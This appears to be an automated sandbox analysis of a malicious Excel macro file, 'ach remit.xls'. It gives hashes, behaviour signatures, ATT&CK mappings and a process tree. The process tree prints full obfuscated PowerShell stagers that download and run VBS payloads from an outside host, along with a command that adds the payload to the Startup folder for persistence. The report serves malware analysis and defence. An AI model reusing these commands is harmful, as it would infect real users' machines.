Overview

overview

10

Static

static

8

ach remit.xls

windows10-2004-x64

10

Resubmissions

23-08-2022 14:29

220823-rtv5jafcfn 10

11-08-2022 03:16

220811-dsn3yaabek 10

05-08-2022 13:05

220805-qbq77adad5 10

05-08-2022 12:41

220805-pw3laaaebm 10

05-08-2022 10:52

220805-mygeqabgg2 10

05-08-2022 10:51

220805-myaxyabgf7 10

05-08-2022 10:51

220805-mx2n9sbgf6 10

05-08-2022 10:45

220805-mtme6sbgc3 10

05-08-2022 07:03

220805-hvb9dagcg6 10

Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2022 12:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ach remit.xls

  • Size

    32KB

  • MD5

    d6b1e5a67d3c55b47096c958646db5b8

  • SHA1

    29ca3e0db93d99395a893d20ab05185e105ce012

  • SHA256

    3cd2459f1d568d4aaaf422c284892810f7cb60dc69af99adb060f84a1c94ece6

  • SHA512

    df8de8e5124882750c712dfd1fbea94df28e467aec45ec7a67c1054828a377308b0993255687bfd7b8fb44e432d95c29b1bd1e75f5962a8595851a6a9b576b33

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ach remit.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\fOMzZ.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi5kbGl1QlNNXCcnK3BtZXQ6dm5lJCwnJ3Nidi50bmVpbEMgZGV0Y2V0b3JQL2V0b24vYWcudG5lbXRzbmkvLzpwdHRoJycoZWxpRmRhJzskVEM9JGMzLCRiNGRmLCR3ZTIyIC1Kb2luICcnO0lFWCgoW3JlZ2V4XTo6TWF0Y2hlcygkVEMsJy4nLCdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJyk7c3RhcnQtcHJvY2VzcygkZW52OnRlbXArICdcTVNCdWlsZC52YnMnKTtyZW1vdmUtaXRlbSAoJGVudjpVU0VSUFJPRklMRSArICdcZk9NelouYmF0Jyk=')))
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101001,01101110,01110011,01110100,01101101,01100101,01101110,01110100,00101110,01100111,01100001,00101111,01101110,01101111,01110100,01100101,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.vbs'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:536
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:4184
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4132
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4132 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3996

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      51aa87521f685fa8d4f4bdbd7684a350

      SHA1

      fd4027d9b24c41461525b0f3f764aa6b2ddd5803

      SHA256

      6e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6

      SHA512

      637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      dca475828832a5738c544717e75d9daa

      SHA1

      d8cd591c9dbbe4dbe64a6dce9e4912087275ed96

      SHA256

      79006bf8a03d9b5ce6c3b3f86133ed8eac915119a359d5ac987b66fc1965d39d

      SHA512

      0ebe11f064a6df00662252af9519f70c32d48974668399582459f4372c658421583c238f43df1f45a7f6ddbbb550d8e60035653a08a96fc2f76d90b64f3554c9

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\MSBuild.vbs
      Filesize

      2KB

      MD5

      72fc1ac661bc37bb1490dac2c0c5ca9b

      SHA1

      f315cd14c12f8024ef17a21594aea6c06432dcfb

      SHA256

      31ee16ff5b988670caab281265a8e02f4ff168f5ee7fef232c4625ebbe693c15

      SHA512

      37e6befb5e37773fc3d8726af53a9cae36031a81f348d834b0a47358d3c96cb91768a6ea62ac9586adeb1a2a073a838053eb775da429e99228ddda518fe40684

      Download Submit
    • C:\Users\Admin\fOMzZ.bat
      Filesize

      847B

      MD5

      0d3332dab10cfa756bb2e3782126575c

      SHA1

      5f4b87871f5f77effc37d17ec240f2e34cdadb4c

      SHA256

      d2f8f2e00fa3d58ed14f5431c7806a00f670db06eeb7fe77ece96c0a7ae3de53

      SHA512

      b7e050c8a7015e8085595f53e97757de3a6def168ae74fcc180be24dd711beeef0d048525ee5758b220d9b9ae76c0b6d9e178f6fc7848580348f8e64226598fa

      Download Submit
    • memory/536-152-0x00007FFF15880000-0x00007FFF16341000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/536-151-0x00007FFF15880000-0x00007FFF16341000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/536-147-0x0000000000000000-mapping.dmp
      Download
    • memory/2728-136-0x00007FFEFD360000-0x00007FFEFD370000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-133-0x00007FFEFF9B0000-0x00007FFEFF9C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-140-0x0000021C7F0B9000-0x0000021C7F0BB000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2728-131-0x00007FFEFF9B0000-0x00007FFEFF9C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-132-0x00007FFEFF9B0000-0x00007FFEFF9C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-134-0x00007FFEFF9B0000-0x00007FFEFF9C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-135-0x00007FFEFD360000-0x00007FFEFD370000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2728-130-0x00007FFEFF9B0000-0x00007FFEFF9C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3168-137-0x0000000000000000-mapping.dmp
      Download
    • memory/3664-146-0x0000000000000000-mapping.dmp
      Download
    • memory/3664-150-0x00007FFF15880000-0x00007FFF16341000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3664-153-0x00007FFF15880000-0x00007FFF16341000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3664-155-0x00007FFF15880000-0x00007FFF16341000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4420-145-0x00007FFF16A00000-0x00007FFF174C1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4420-139-0x0000000000000000-mapping.dmp
      Download
    • memory/4420-142-0x00007FFF16A00000-0x00007FFF174C1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4420-141-0x0000025117C70000-0x0000025117C92000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4664-143-0x0000000000000000-mapping.dmp
      Download